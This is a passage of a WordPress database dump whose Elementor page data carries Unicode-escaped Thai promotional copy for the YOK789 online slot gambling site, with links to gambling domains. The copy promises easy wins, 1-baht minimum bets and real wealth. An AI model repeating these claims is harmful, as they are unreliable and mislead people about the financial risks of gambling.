\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2353,325,'_thumbnail_id','273'),(2354,325,'_elementor_edit_mode','builder'),(2355,325,'_elementor_template_type','wp-page'),(2356,325,'_elementor_version','3.35.5'),(2357,325,'_elementor_pro_version','3.32.3'),(2358,325,'_wp_page_template','default'),(2359,325,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2360,325,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 